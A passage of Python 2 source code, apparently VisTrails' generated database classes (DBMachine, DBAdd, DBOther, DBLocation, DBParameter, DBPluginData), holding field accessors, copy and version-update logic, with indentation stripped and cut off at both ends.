res = class_dict['vistrail_id'](old_obj, trans_dict)
new_obj.db_vistrail_id = res
elif hasattr(old_obj, 'db_vistrail_id') and old_obj.db_vistrail_id is not None:
new_obj.db_vistrail_id = old_obj.db_vistrail_id
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_workflow_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_workflow_exec(child)
to_del = []
for child in self.db_machines:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_machine(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_workflow_execs)
children.extend(self.db_deleted_machines)
if remove:
self.db_deleted_workflow_execs = []
self.db_deleted_machines = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_workflow_execs:
if child.has_changes():
return True
for child in self._db_machines:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_workflow_execs(self):
return self._db_workflow_execs
def __set_db_workflow_execs(self, workflow_execs):
self._db_workflow_execs = workflow_execs
self.is_dirty = True
db_workflow_execs = property(__get_db_workflow_execs, __set_db_workflow_execs)
def db_get_workflow_execs(self):
return self._db_workflow_execs
def db_add_workflow_exec(self, workflow_exec):
self.is_dirty = True
self._db_workflow_execs.append(workflow_exec)
self.db_workflow_execs_id_index[workflow_exec.db_id] = workflow_exec
def db_change_workflow_exec(self, workflow_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == workflow_exec.db_id:
self._db_workflow_execs[i] = workflow_exec
found = True
break
if not found:
self._db_workflow_execs.append(workflow_exec)
self.db_workflow_execs_id_index[workflow_exec.db_id] = workflow_exec
def db_delete_workflow_exec(self, workflow_exec):
self.is_dirty = True
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == workflow_exec.db_id:
if not self._db_workflow_execs[i].is_new:
self.db_deleted_workflow_execs.append(self._db_workflow_execs[i])
del self._db_workflow_execs[i]
break
del self.db_workflow_execs_id_index[workflow_exec.db_id]
def db_get_workflow_exec(self, key):
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == key:
return self._db_workflow_execs[i]
return None
def db_get_workflow_exec_by_id(self, key):
return self.db_workflow_execs_id_index[key]
def db_has_workflow_exec_with_id(self, key):
return key in self.db_workflow_execs_id_index
def __get_db_machines(self):
return self._db_machines
def __set_db_machines(self, machines):
self._db_machines = machines
self.is_dirty = True
db_machines = property(__get_db_machines, __set_db_machines)
def db_get_machines(self):
return self._db_machines
def db_add_machine(self, machine):
self.is_dirty = True
self._db_machines.append(machine)
self.db_machines_id_index[machine.db_id] = machine
def db_change_machine(self, machine):
self.is_dirty = True
found = False
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == machine.db_id:
self._db_machines[i] = machine
found = True
break
if not found:
self._db_machines.append(machine)
self.db_machines_id_index[machine.db_id] = machine
def db_delete_machine(self, machine):
self.is_dirty = True
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == machine.db_id:
if not self._db_machines[i].is_new:
self.db_deleted_machines.append(self._db_machines[i])
del self._db_machines[i]
break
del self.db_machines_id_index[machine.db_id]
def db_get_machine(self, key):
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == key:
return self._db_machines[i]
return None
def db_get_machine_by_id(self, key):
return self.db_machines_id_index[key]
def db_has_machine_with_id(self, key):
return key in self.db_machines_id_index
def __get_db_vistrail_id(self):
return self._db_vistrail_id
def __set_db_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
self.is_dirty = True
db_vistrail_id = property(__get_db_vistrail_id, __set_db_vistrail_id)
def db_add_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_change_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_delete_vistrail_id(self, vistrail_id):
self._db_vistrail_id = None
def getPrimaryKey(self):
return self._db_id
class DBMachine(object):
vtType = 'machine'
def __init__(self, id=None, name=None, os=None, architecture=None, processor=None, ram=None):
self._db_id = id
self._db_name = name
self._db_os = os
self._db_architecture = architecture
self._db_processor = processor
self._db_ram = ram
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBMachine.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBMachine(id=self._db_id,
name=self._db_name,
os=self._db_os,
architecture=self._db_architecture,
processor=self._db_processor,
ram=self._db_ram)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_vistrailId') and ('vistrail', self._db_vistrailId) in id_remap:
cp._db_vistrailId = id_remap[('vistrail', self._db_vistrailId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBMachine()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'os' in class_dict:
res = class_dict['os'](old_obj, trans_dict)
new_obj.db_os = res
elif hasattr(old_obj, 'db_os') and old_obj.db_os is not None:
new_obj.db_os = old_obj.db_os
if 'architecture' in class_dict:
res = class_dict['architecture'](old_obj, trans_dict)
new_obj.db_architecture = res
elif hasattr(old_obj, 'db_architecture') and old_obj.db_architecture is not None:
new_obj.db_architecture = old_obj.db_architecture
if 'processor' in class_dict:
res = class_dict['processor'](old_obj, trans_dict)
new_obj.db_processor = res
elif hasattr(old_obj, 'db_processor') and old_obj.db_processor is not None:
new_obj.db_processor = old_obj.db_processor
if 'ram' in class_dict:
res = class_dict['ram'](old_obj, trans_dict)
new_obj.db_ram = res
elif hasattr(old_obj, 'db_ram') and old_obj.db_ram is not None:
new_obj.db_ram = old_obj.db_ram
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_os(self):
return self._db_os
def __set_db_os(self, os):
self._db_os = os
self.is_dirty = True
db_os = property(__get_db_os, __set_db_os)
def db_add_os(self, os):
self._db_os = os
def db_change_os(self, os):
self._db_os = os
def db_delete_os(self, os):
self._db_os = None
def __get_db_architecture(self):
return self._db_architecture
def __set_db_architecture(self, architecture):
self._db_architecture = architecture
self.is_dirty = True
db_architecture = property(__get_db_architecture, __set_db_architecture)
def db_add_architecture(self, architecture):
self._db_architecture = architecture
def db_change_architecture(self, architecture):
self._db_architecture = architecture
def db_delete_architecture(self, architecture):
self._db_architecture = None
def __get_db_processor(self):
return self._db_processor
def __set_db_processor(self, processor):
self._db_processor = processor
self.is_dirty = True
db_processor = property(__get_db_processor, __set_db_processor)
def db_add_processor(self, processor):
self._db_processor = processor
def db_change_processor(self, processor):
self._db_processor = processor
def db_delete_processor(self, processor):
self._db_processor = None
def __get_db_ram(self):
return self._db_ram
def __set_db_ram(self, ram):
self._db_ram = ram
self.is_dirty = True
db_ram = property(__get_db_ram, __set_db_ram)
def db_add_ram(self, ram):
self._db_ram = ram
def db_change_ram(self, ram):
self._db_ram = ram
def db_delete_ram(self, ram):
self._db_ram = None
def getPrimaryKey(self):
return self._db_id
class DBAdd(object):
vtType = 'add'
def __init__(self, data=None, id=None, what=None, objectId=None, parentObjId=None, parentObjType=None):
self.db_deleted_data = []
self._db_data = data
self._db_id = id
self._db_what = what
self._db_objectId = objectId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAdd.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAdd(id=self._db_id,
what=self._db_what,
objectId=self._db_objectId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
if self._db_data is not None:
cp._db_data = self._db_data.do_copy(new_ids, id_scope, id_remap)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_objectId') and (self._db_what, self._db_objectId) in id_remap:
cp._db_objectId = id_remap[(self._db_what, self._db_objectId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAdd()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
obj = old_obj.db_data
if obj.vtType == 'module':
new_obj.db_add_data(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'location':
new_obj.db_add_data(DBLocation.update_version(obj, trans_dict))
elif obj.vtType == 'annotation':
new_obj.db_add_data(DBAnnotation.update_version(obj, trans_dict))
elif obj.vtType == 'function':
new_obj.db_add_data(DBFunction.update_version(obj, trans_dict))
elif obj.vtType == 'connection':
new_obj.db_add_data(DBConnection.update_version(obj, trans_dict))
elif obj.vtType == 'port':
new_obj.db_add_data(DBPort.update_version(obj, trans_dict))
elif obj.vtType == 'parameter':
new_obj.db_add_data(DBParameter.update_version(obj, trans_dict))
elif obj.vtType == 'portSpec':
new_obj.db_add_data(DBPortSpec.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_data(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_data(DBGroup.update_version(obj, trans_dict))
elif obj.vtType == 'other':
new_obj.db_add_data(DBOther.update_version(obj, trans_dict))
elif obj.vtType == 'plugin_data':
new_obj.db_add_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_data') and hasattr(new_obj, 'db_deleted_data'):
for obj in old_obj.db_deleted_data:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'location':
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'annotation':
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'function':
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'connection':
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'port':
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'parameter':
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'portSpec':
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'other':
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'plugin_data':
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'objectId' in class_dict:
res = class_dict['objectId'](old_obj, trans_dict)
new_obj.db_objectId = res
elif hasattr(old_obj, 'db_objectId') and old_obj.db_objectId is not None:
new_obj.db_objectId = old_obj.db_objectId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_data is not None:
children.extend(self._db_data.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_data = None
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_data)
if remove:
self.db_deleted_data = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_data is not None and self._db_data.has_changes():
return True
return False
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
if not self.is_new:
self.db_deleted_data.append(self._db_data)
self._db_data = None
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_objectId(self):
return self._db_objectId
def __set_db_objectId(self, objectId):
self._db_objectId = objectId
self.is_dirty = True
db_objectId = property(__get_db_objectId, __set_db_objectId)
def db_add_objectId(self, objectId):
self._db_objectId = objectId
def db_change_objectId(self, objectId):
self._db_objectId = objectId
def db_delete_objectId(self, objectId):
self._db_objectId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
class DBOther(object):
vtType = 'other'
def __init__(self, id=None, key=None, value=None):
self._db_id = id
self._db_key = key
self._db_value = value
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBOther.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBOther(id=self._db_id,
key=self._db_key,
value=self._db_value)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBOther()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'key' in class_dict:
res = class_dict['key'](old_obj, trans_dict)
new_obj.db_key = res
elif hasattr(old_obj, 'db_key') and old_obj.db_key is not None:
new_obj.db_key = old_obj.db_key
if 'value' in class_dict:
res = class_dict['value'](old_obj, trans_dict)
new_obj.db_value = res
elif hasattr(old_obj, 'db_value') and old_obj.db_value is not None:
new_obj.db_value = old_obj.db_value
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_key(self):
return self._db_key
def __set_db_key(self, key):
self._db_key = key
self.is_dirty = True
db_key = property(__get_db_key, __set_db_key)
def db_add_key(self, key):
self._db_key = key
def db_change_key(self, key):
self._db_key = key
def db_delete_key(self, key):
self._db_key = None
def __get_db_value(self):
return self._db_value
def __set_db_value(self, value):
self._db_value = value
self.is_dirty = True
db_value = property(__get_db_value, __set_db_value)
def db_add_value(self, value):
self._db_value = value
def db_change_value(self, value):
self._db_value = value
def db_delete_value(self, value):
self._db_value = None
def getPrimaryKey(self):
return self._db_id
class DBLocation(object):
vtType = 'location'
def __init__(self, id=None, x=None, y=None):
self._db_id = id
self._db_x = x
self._db_y = y
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLocation.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLocation(id=self._db_id,
x=self._db_x,
y=self._db_y)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLocation()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'x' in class_dict:
res = class_dict['x'](old_obj, trans_dict)
new_obj.db_x = res
elif hasattr(old_obj, 'db_x') and old_obj.db_x is not None:
new_obj.db_x = old_obj.db_x
if 'y' in class_dict:
res = class_dict['y'](old_obj, trans_dict)
new_obj.db_y = res
elif hasattr(old_obj, 'db_y') and old_obj.db_y is not None:
new_obj.db_y = old_obj.db_y
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_x(self):
return self._db_x
def __set_db_x(self, x):
self._db_x = x
self.is_dirty = True
db_x = property(__get_db_x, __set_db_x)
def db_add_x(self, x):
self._db_x = x
def db_change_x(self, x):
self._db_x = x
def db_delete_x(self, x):
self._db_x = None
def __get_db_y(self):
return self._db_y
def __set_db_y(self, y):
self._db_y = y
self.is_dirty = True
db_y = property(__get_db_y, __set_db_y)
def db_add_y(self, y):
self._db_y = y
def db_change_y(self, y):
self._db_y = y
def db_delete_y(self, y):
self._db_y = None
def getPrimaryKey(self):
return self._db_id
class DBParameter(object):
vtType = 'parameter'
def __init__(self, id=None, pos=None, name=None, type=None, val=None, alias=None):
self._db_id = id
self._db_pos = pos
self._db_name = name
self._db_type = type
self._db_val = val
self._db_alias = alias
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBParameter.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBParameter(id=self._db_id,
pos=self._db_pos,
name=self._db_name,
type=self._db_type,
val=self._db_val,
alias=self._db_alias)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBParameter()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'pos' in class_dict:
res = class_dict['pos'](old_obj, trans_dict)
new_obj.db_pos = res
elif hasattr(old_obj, 'db_pos') and old_obj.db_pos is not None:
new_obj.db_pos = old_obj.db_pos
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'val' in class_dict:
res = class_dict['val'](old_obj, trans_dict)
new_obj.db_val = res
elif hasattr(old_obj, 'db_val') and old_obj.db_val is not None:
new_obj.db_val = old_obj.db_val
if 'alias' in class_dict:
res = class_dict['alias'](old_obj, trans_dict)
new_obj.db_alias = res
elif hasattr(old_obj, 'db_alias') and old_obj.db_alias is not None:
new_obj.db_alias = old_obj.db_alias
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_pos(self):
return self._db_pos
def __set_db_pos(self, pos):
self._db_pos = pos
self.is_dirty = True
db_pos = property(__get_db_pos, __set_db_pos)
def db_add_pos(self, pos):
self._db_pos = pos
def db_change_pos(self, pos):
self._db_pos = pos
def db_delete_pos(self, pos):
self._db_pos = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_val(self):
return self._db_val
def __set_db_val(self, val):
self._db_val = val
self.is_dirty = True
db_val = property(__get_db_val, __set_db_val)
def db_add_val(self, val):
self._db_val = val
def db_change_val(self, val):
self._db_val = val
def db_delete_val(self, val):
self._db_val = None
def __get_db_alias(self):
return self._db_alias
def __set_db_alias(self, alias):
self._db_alias = alias
self.is_dirty = True
db_alias = property(__get_db_alias, __set_db_alias)
def db_add_alias(self, alias):
self._db_alias = alias
def db_change_alias(self, alias):
self._db_alias = alias
def db_delete_alias(self, alias):
self._db_alias = None
def getPrimaryKey(self):
return self._db_id
class DBPluginData(object):
vtType = 'plugin_data'
def __init__(self, id=None, data=None):
self._db_id = id
self._db_data = data
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPluginData.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPluginData(id=self._db_id,
data=self._db_data)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPluginData()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
new_obj.db_data = old_obj.db_data
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
self._db_data = None
def getPrimaryKey(self):
return self._db_id
class DBFunction(object):
vtType = 'function'
def __init__(self, id=None, pos=None, name=None, parameters=None):
self._db_id = id
self._db_pos = pos
self._db_name = name
self.db_deleted_parameters = []
self.db_parameters_id_index = {}
if parameters is None:
self._db_parameters = []
else:
self._db_parameters = parameters
for v in self._db_parameters:
